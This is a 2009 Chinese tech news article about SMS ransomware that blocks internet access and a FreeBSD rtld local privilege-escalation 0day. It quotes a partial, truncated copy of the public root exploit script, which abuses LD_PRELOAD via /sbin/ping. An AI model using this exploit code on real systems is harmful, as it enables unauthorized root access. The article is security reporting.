科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道终端安全曝会勒索可切断网络连接的恶意软件

曝会勒索可切断网络连接的恶意软件

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

 最近网络上出现了一种新型的勒索方式,俄罗斯网络流氓们开发了一种新型流氓软件,这种病毒软件可以切断用户的互联网连接。另据国外媒体报道,英国安全公司Prevx向微软道歉,表示黑屏问题与补丁无关。而向来被人唾骂的黑客却也有着善意和可爱的一面,继报道保钓联合会网站被黑的消息后,数百名网友表示愿意提供网络安全资讯和设备软件,更有黑客甚至通过攻击网站的形式进行善意提醒。

来源:比特网 2009年12月7日

关键字: 恶意软件 过滤防护

  • 评论
  • 分享微博
  • 分享邮件

  最近网络上出现了一种新型的勒索方式,俄罗斯网络流氓们开发了一种新型流氓软件,这种病毒软件可以切断用户的互联网连接。另据国外媒体报道,英国安全公司Prevx向微软道歉,表示黑屏问题与补丁无关。而向来被人唾骂的黑客却也有着善意和可爱的一面,继报道保钓联合会网站被黑的消息后,数百名网友表示愿意提供网络安全资讯和设备软件,更有黑客甚至通过攻击网站的形式进行善意提醒。

  1、可切断用户互联网连接:俄罗斯网络流氓开发出新型流氓勒索软件

  最近网络上出现了一种新型的勒索方式,俄罗斯网络流氓们开发了一种名为uFastDownloadManager的新型流氓软件,这种病毒软件可以切断用户的互联网连接,并要求用户向一个指定的俄罗斯境内电话号码发送收费短信,通过这种卑鄙的方式来敛财。

  

曝会勒<a href='http://product.enet.com.cn/price/plist32_88586.shtml' target='_blank' class='article'>索可</a>切断网络连接的恶意软件

  

null

  感染了这种病毒的用户会收到一条以俄文撰写的信息,这条信息要求用户发送一条收费短信,以获取这款流氓软件的注册码,信息同时还警告称由于用户违反了这款流氓软件的授权协议,因此其互联网连接已被屏蔽,需要取得软件注册码后才能重新开启互联网连接。

  过去曾有其它种类的流氓软件会将用户的文档进行加密和屏蔽处理。2008年一月份,有一款流氓软件会锁住用户的Windows操作系统,并要求用户发送收费短信给指定的号码。不过这款软件似乎与俄罗斯无关,而且也不会切断用户的互联网连接,不过它和这次的流氓软件行为非常相似。

  杀软厂商CA将这种病毒标记为RansomSMS-AH病毒,该厂商并在自己的博客上详细解释了这款流氓软件的工作原理,并提供了感染这种病毒的系统截图。目前这家杀毒厂商已经开发出了一款序列号生成器,使用这种生成器生成的软件序列号,用户无需发送收费短信便可“激活”自己的互联网连接。

  2、FreeBSD爆严重安全漏洞 安全专家称疑是圣诞前的礼物

  在圣诞节即将到来的日子,以安全着称的FreeBSD系统被着名黑客Kingcope爆了一个零日(0day)漏洞。据Kingcope所说,他长期致力于挖掘FreeBSD系统的本地提权漏洞,终于有幸在近期发现了这个非常低级的本地提权漏洞;这个漏洞存在于FreeBSD的Run-TimeLink-Editor(rtld)程序中,普通用户可以通过该漏洞非常轻易的获得root权限。该漏洞影响非常广泛,包括FreeBSD7.1至8.0的32及64位系统。

  在展示该漏洞威力之前,我们先了解一下着名黑客kingcope。从2007年6月至今,他一共公开了12个安全漏洞(没公开的不知道有多少),其中FreeBSD和SunSolaris各两个,微软四个,Oracle、mysql、NcFTPD和nginx各一个,同时他还编写了多个漏洞的攻击代码,例如SunSolaristelnetd及近期的IISFTPd、Debian OpenSSH等。

  接下来我们在最新的FreeBSD8.0中重现一下该漏洞的攻击过程,请注意图中的红色部分;我们只要执行名为fbsd8localroot.sh的脚本,就可以轻易的获得root权限。

  

null

  相关脚本如下:

  #!/bin/sh

  echo “FreeBSD local r00t zeroday by KingcopeonNovember2009″

  cat > env.c 《 _EOF

  #include

  main() {

  extern char **environ;

  environ = (char**)malloc(8096);

  environ[0] = (char*)malloc(1024);

  environ[1] = (char*)malloc(1024);

  strcpy(environ[1], “LD_PRELOAD=/tmp/w00t.so.1.0″);

  execl(”/sbin/ping”, “ping”, 0);

  }

  _EOF

  gcc env.c -o env > /dev/null 2>

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章